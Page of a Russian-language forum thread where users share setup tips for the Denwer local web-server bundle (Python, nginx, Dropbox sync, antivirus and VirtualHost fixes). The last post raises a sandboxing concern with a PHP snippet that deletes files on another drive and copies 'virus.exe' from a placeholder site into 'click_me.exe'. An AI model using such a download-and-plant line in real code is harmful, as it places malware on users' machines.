Форум dkLab и Denwer
Здесь общаются Web-разработчики.
Генеральный спонсор:
Хостинг «Джино»

Новые советы. (Дмитрий Котеров)
Goto page Previous  1, 2
Author Message
bæv
Модератор «Дзена»



Joined: 27 Aug 2003
Posts: 7275
Карма: 9986
   поощрить/наказать


PostPosted: Thu Mar 11, 2010 5:18 am ()
   Post subject:
Reply with quote


М

Ветка выделена в отдельную тему «нет русского языка»,
расположенную в форуме Мусоропровод (11 Марта 2010, 05:18).
Back to top
View user's profile Send private message
Kirpich
Заглянувший



Joined: 18 Jan 2009
Posts: 16
Карма: 0
   поощрить/наказать


PostPosted: Sun May 16, 2010 9:26 pm (спустя 2 месяца 5 дней 16 часов 7 минут; написано за 3 минуты 25 секунд)
   Post subject:
Reply with quote

Многие переходят на Windows 7 x64!
Было бы полезно знать - будет ли работать Denwer на Windows 7 x64, ШТАТНО/СТАБИЛЬНО?
Желательно ответ из первых рук - от автора проекта.
В форуме тема несколько раз поднималась, но четкого ответа нет, только мнения и рекомендации.
Спасибо.
Back to top
View user's profile Send private message
Monstr.ru
Заглянувший



Joined: 26 Jun 2010
Posts: 1
Карма: 0
   поощрить/наказать


PostPosted: Sat Jun 26, 2010 7:47 pm (спустя 1 месяц 9 дней 22 часа 21 минуту; написано за 3 минуты 13 секунд)
   Post subject:
Reply with quote

В Windows 7 x64 входящее подключение по vpn занимает 443 порт, поэтому не отображается localhost, test1.ru и не стартует apache
Back to top
View user's profile Send private message
starinsky
Заглянувший



Joined: 19 Oct 2010
Posts: 3
Карма: -2
   поощрить/наказать


PostPosted: Wed Oct 20, 2010 10:24 pm (спустя 3 месяца 24 дня 2 часа 37 минут; написано за 9 минут 20 секунд)
   Post subject: Небольшое приложение под Denwer для работы с сервером Apache
Reply with quote

Denwer Control

Небольшое трей приложение для запуска служб Денвер.
code.google.com/p/apache-control-for-denwer/


apache-control.png
 Description:
snapshot
 Filesize:  4.3 KB
 Viewed:  33567 Time(s)

apache-control.png




Last edited by starinsky on Mon Apr 04, 2011 4:26 pm; edited 1 time in total
Back to top
View user's profile Send private message
Alex11
Заглянувший



Joined: 23 Oct 2010
Posts: 1
Карма: 0
   поощрить/наказать


PostPosted: Sat Oct 23, 2010 9:30 am (спустя 2 дня 11 часов 6 минут; написано за 20 минут 43 секунды)
   Post subject: Re: Python + /usr/bin/env + Denwer
Reply with quote

Rz wrote:
В дополнение к советам о прикручивании Питона к Денверу.

Часто в скриптах на Питоне встречается "более правильная" строка вызова интерпретатора вида #!/usr/bin/env python. Для того, чтобы скрипты с такой строкой заработали как положено, оказалось достаточно сделать следующее:

1. Раздобыть (или написать самому и скомпилировать) файл env.exe, функция которого состоит лишь в том, чтобы запустить свой первый параметр. Я взял этот файл из пакета UnxUtils unxutils.sourceforge.net/. Кстати, в этом пакете помимо упомянутого env.exe можно найти много других интересных утилит, которые, без сомнения, будут присутствовать на UNIX-хостинге и могут быть использованы в CGI-скриптах.
2. Положить этот env.exe в Z:\usr\bin
3. Протестировать работу Python, заменив строчку вызова
#!/usr/bin/python на #!usr/bin/env python

Например, так:
Code (Python): скопировать код в буфер обмена
#!/usr/bin/env python
print "content-type: text/plain\r\n\r\n"
print "Hello world"
спасибо за полезную инфу, давно искал, еще раз спасибо
Back to top
View user's profile Send private message
Искандер
Заглянувший



Joined: 26 Nov 2010
Posts: 1
Карма: 2
   поощрить/наказать


PostPosted: Fri Nov 26, 2010 1:22 pm (спустя 1 месяц 3 дня 3 часа 51 минуту; написано за 18 секунд)
   Post subject:
Reply with quote

написал совет как прикрутить nginx к денверу, может будет полезным:
habrahabr.ru/blogs/webdev/108865/
Back to top
View user's profile Send private message
Maus
Модератор



Joined: 29 Jun 2003
Posts: 8151
Карма: 271
   поощрить/наказать

Location: пос. Омсукчан Магаданской области

PostPosted: Wed Dec 01, 2010 4:07 am (спустя 4 дня 14 часов 45 минут)
   Post subject:
Reply with quote


М

Ветка выделена в отдельную тему «Неудалось подключение к localhost»,
расположенную в форуме Лень сходить в Поиск или почитать документацию (01 Декабря 2010, 04:07).
Back to top
View user's profile Send private message
bæv
Модератор «Дзена»



Joined: 27 Aug 2003
Posts: 7275
Карма: 9986
   поощрить/наказать


PostPosted: Sun Dec 05, 2010 9:47 pm (спустя 4 дня 17 часов 40 минут)
   Post subject:
Reply with quote


М

Ветка выделена в отдельную тему «мусор, не относящийся к теме»,
расположенную в форуме Мусоропровод (05 Декабря 2010, 21:47).
Back to top
View user's profile Send private message
bæv
Модератор «Дзена»



Joined: 27 Aug 2003
Posts: 7275
Карма: 9986
   поощрить/наказать


PostPosted: Sat Dec 11, 2010 2:19 pm (спустя 5 дней 16 часов 32 минуты)
   Post subject:
Reply with quote


М

Ветка выделена в отдельную тему «мусор, не относящийся к теме»,
расположенную в форуме Мусоропровод (11 Декабря 2010, 14:19).
Back to top
View user's profile Send private message
Pingvin
Заглянувший
Banned


Joined: 05 Aug 2009
Posts: 12
Карма: -12
   поощрить/наказать

Location: Пенза

PostPosted: Wed Jan 26, 2011 4:20 pm (спустя 1 месяц 15 дней 2 часа 22 секунды)
   Post subject:
Reply with quote

Для отладки можно печатать отладочную информацию через if (!empty($otladka))… (тогда в ссылке надо указать ?otladka=1, а где-нибудь вначале if (!empty($_GET['otladka'])) $otladka=$_GET['otladka'];) или if ($_SERVER['HTTP_HOST']!='localhost')… , можно так же вставлять отладочную информацию в комментарии (как в книге Лауры Томсон и Люка Веллинг “РНР и Муsql”, в этой книге приведена отладочная программа, которой я часто пользуюсь), тогда она будет всегда при просмотре исходного кода, из недостатков этого метода следует отметить, что независимо от того нужна или нет отладка, код загружает сервер.
Back to top
View user's profile Send private message Send e-mail
bæv
Модератор «Дзена»



Joined: 27 Aug 2003
Posts: 7275
Карма: 9986
   поощрить/наказать


PostPosted: Wed Jan 26, 2011 8:06 pm (спустя 3 часа 46 минут; написано за 12 секунд)
   Post subject:
Reply with quote

Pingvin:
phpfaq.ru/debug
Back to top
View user's profile Send private message
Kalistos
Заглянувший



Joined: 06 Feb 2011
Posts: 1
Карма: 0
   поощрить/наказать


PostPosted: Sun Feb 06, 2011 4:20 pm (спустя 10 дней 20 часов 14 минут; написано за 8 минут 25 секунд)
   Post subject:
Reply with quote

Я бы хотел увидеть такую возможность в денвере как мультивыбор папок откуда будут подниматься сайты.
То есть например мы имеем установленный денвер в папке C:\WebServer и значит сайты поднимаются только из каталога C:\WebServer\home, очень удобно было бы если бы я мог добавить каталог из дропбокса например ..\DropBox\Denwer\home и при этом денвер будет установлен не в дропбоксе, а в папке C:\WebServer, а из дропбокса он только тягает сам сайт и базу данных, ставить денвер целиком в дропбокс не нужно, так как мне не нужны все мои сайты в дропбоксе, и также можно было бы еще брать сайты с флешки, целиком ставить денвер на флешку напрягает, так как скорость работы от этого падает в разы на всех сайтах, что не есть приемлемо. Только тогда надо будет продумать как хранить базу данных.
В общем хотелось бы такую реализацию, и если она в какой-то мере возможна сейчас, и я что-то упустил, то намекните пожалуйста)
P.S. Ставить 3 денвера reserve это конечно вариант, но удобнее для пользователя было бы сделать все таки добавляемые папки.
Back to top
View user's profile Send private message
Maus
Модератор



Joined: 29 Jun 2003
Posts: 8151
Карма: 271
   поощрить/наказать

Location: пос. Омсукчан Магаданской области

PostPosted: Tue Feb 08, 2011 12:11 pm (спустя 1 день 19 часов 50 минут; написано за 35 секунд)
   Post subject:
Reply with quote

Kalistos
если у Вас файловая система NTFS, то Сходите, пожалуйста, в Поиск по запросу «junction». Спасибо!
Back to top
View user's profile Send private message
bæv
Модератор «Дзена»



Joined: 27 Aug 2003
Posts: 7275
Карма: 9986
   поощрить/наказать


PostPosted: Wed Jun 29, 2011 5:39 pm (спустя 4 месяца 21 день 5 часов 28 минут)
   Post subject:
Reply with quote


М

Ветка выделена в отдельную тему «спам»,
расположенную в форуме Мусоропровод (29 Июня 2011, 18:39).
Back to top
View user's profile Send private message
Goldberg
Заглянувший



Joined: 24 Sep 2011
Posts: 1
Карма: -2
   поощрить/наказать

Location: Москва

PostPosted: Sat Sep 24, 2011 3:54 pm (спустя 2 месяца 24 дня 22 часа 14 минут; написано за 2 минуты 15 секунд)
   Post subject: Denwer на двух и более компах без флешки.
Reply with quote

Когда я работал над созданием первого и пока единственного сайта на локальном сервере, я хотел использовать его (сервер) и дома и на работе, поэтому с большим интересом прочитал ветку “Денвер на свистке” . Однако, в процессе поиска и добавления на сайт контента (бесплатное программное обеспечение и сервисы), я по-своему решил проблему синхронизации данных локального сервера на домашнем и рабочем компьютерах. Для этого я воспользовался бесплатным сервисом DropBox www.dropbox.com/, который создал одноименную папку в МоихДокументах и бесплатной же графической оболочкой VisualSubst www.ntwind.com/software/utilities/visual-subst.html, подключив с ее помощью папку с локальным сервером в качестве виртуального диска. Таким образом я получил виртуальный диск с одинаковым и синхронизированным содержанием и на работе, и дома. Надеюсь, кому-нибудь этот вариант использования локального сервера на нескольких компах окажется полезным.
ps Правила прочитал, вроде не было запрета на публикацию ссылок на свои ресурсы.
Back to top
View user's profile Send private message
bæv
Модератор «Дзена»



Joined: 27 Aug 2003
Posts: 7275
Карма: 9986
   поощрить/наказать


PostPosted: Sat Sep 24, 2011 5:56 pm (спустя 2 часа 2 минуты; написано за 1 минуту 21 секунду)
   Post subject:
Reply with quote

Goldberg wrote:
Правила прочитал, вроде не было запрета на публикацию ссылок на свои ресурсы.

М

тут реклама — платная.
Поэтому ссылки я заменил на правильные, не рекламирующие очередной портал.
Back to top
View user's profile Send private message
bæv
Модератор «Дзена»



Joined: 27 Aug 2003
Posts: 7275
Карма: 9986
   поощрить/наказать


PostPosted: Thu Jun 28, 2012 9:09 pm (спустя 9 месяцев 4 дня 3 часа 13 минут)
   Post subject:
Reply with quote


М

Ветка выделена в отдельную тему «спам»,
расположенную в форуме Мусоропровод (28 Июня 2012, 22:09).
Back to top
View user's profile Send private message
Ilya Drozdov
Заглянувший



Joined: 11 Nov 2013
Posts: 1
Карма: 0
   поощрить/наказать

Location: Беларусь, Минск

PostPosted: Tue Nov 12, 2013 12:11 am (спустя 1 год 4 месяца 13 дней 3 часа 1 минуту; написано за 18 минут 38 секунд)
   Post subject: У кого Windows 7 и ESET Smart Security (не грузится localhost или пустые страницы)
Reply with quote

Тема полезна пользователям Windows 7 и ESET Smart Security 4 в одном "железном флаконе". Установил по всем правилам Денвер, а "Ура все получилось!" - совсем не получилось, пустая страница на всех браузерах, которые у меня стоят. Перелазил кучу тем на форуме и пинговал, и скайп отключал, и порт менял, и антивирусник с файрволОМ отключал,прокси для всех браузеров отключал, вообщем как только не пытался решить проблему. В итоге, на 2й день мучений методом перебора всевозможных предложенных вариантов, разобрался.
Решение:
1. Все настройки антивирусника скинул по умолчанию, т.к. были некоторые ручные настройки.
2. Выбрал настройки (F5) - защита от вирусов и шпионских программ - защита доступа в интернет - HTTP,HTTPS(при этом галка "Вкл. проверку http портов стоит" и порт 80 указан) - управление адресами - выбираем "список адресов, для которых отключено фильтрование" - отмечаем галкой "список активизирован" - добавить ( и добавляем следующую запись - localhost*) - жмем ОК ----- ИИИИИИИИИИ-вуаля - "УРА ВСЕ ПОЛУЧИЛОСЬ!!!" и скайп работает с галочкой "использовать 80 порт" и без нее, и в nete сижу, а в соседней вкладке lokalhost работает.
Если кому-то помог, очень рад. Иногда мелкая пакость аж на коня белого садит.
Back to top
View user's profile Send private message
v2016
Заглянувший



Joined: 19 Nov 2016
Posts: 7
Карма: 0
   поощрить/наказать


PostPosted: Mon Mar 19, 2018 7:03 am (спустя 4 года 4 месяца 7 дней 6 часов 52 минуты; написано за 1 минуту 2 секунды)
   Post subject: Совет как сделать, чтобы выидны были сайты на разных логических дисках
Reply with quote

В Денвере с PHP 4 можно было прописать сайты которые находятся на других логических дисках, а в денвере с PHP5 так не работает. Что изменилось? Как сделать тоже на денвере с PHP 5? Конкретно с PHP 5.2

Там в файле httpd.conf
нужно было написать

Include conf/dop_hosts.conf

а в файле dop_hosts.conf


<VirtualHost 127.0.0.1:80>
    ServerAdmin webmaster@host.some_domain.com
    DocumentRoot G:/sitefiles/
    ServerName sitefiles
    ErrorLog /sitefiles/logs/
    CustomLog /sitefiles/logs/
</VirtualHost>

И все работало. А вот в PHP5 так не получается. Что изменилось.

И в файле hosts кажется нужно было прописать их кстати...
И если в файле dop_hosts.conf что - то неправильно указать... ну например букву диска неправильную, то не открывался никакой сайт при запуске денвера.

Вот об этом не могу найти никак уже давно...

Last edited by v2016 on Mon Mar 19, 2018 8:52 am; edited 1 time in total
Back to top
View user's profile Send private message
v2016
Заглянувший



Joined: 19 Nov 2016
Posts: 7
Карма: 0
   поощрить/наказать


PostPosted: Mon Mar 19, 2018 8:39 am (спустя 1 час 36 минут; написано за 7 минут 3 секунды)
   Post subject: А как чтобы было нельзя?
Reply with quote

Я тут неожиданно для себя обнаружил, что через Денвер можно осуществлять любые действия с файлами и папками вне сайта и на любом диске...
И просматривать, и удалять, и закачивать и наверняка все остальные...
И с одной стороны это конечно очень здорово...
Но с другой создает проблемы с безопасностью если пользоваться чужими скриптами или даже тестировать чужие скрипты...
Поэтому вопрос возникает как можно сделать, чтобы было нельзя и php скрипты могли действовать только в пределах сайта на котором находятся.

Вот что строки которыми тестировал это у себя и все получилось... подозреваю, что и все остальные возможные действия типа переименования и создания файлов тоже получатся без проблем...

$files_h=scandir("H:\\files");
if(is_dir("H:\\files\\qwe")) echo "папка создана"; else mkdir("H:\\files\\qwe");
if(unlink("H:\\files\\123.txt")) echo "-----------------------";

copy("httр://kakoitosait.ru/virus.exe","H:\\files\\click_me.exe");
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic All times are GMT + 3 Hours
Goto page Previous  1, 2
Page 2 of 2    Email to a Friend.
You cannot post new topics in this forum. You cannot reply to topics in this forum. You cannot edit your posts in this forum. You cannot delete your posts in this forum. You cannot vote in polls in this forum. You cannot attach files in this forum. You can download files in this forum.
XML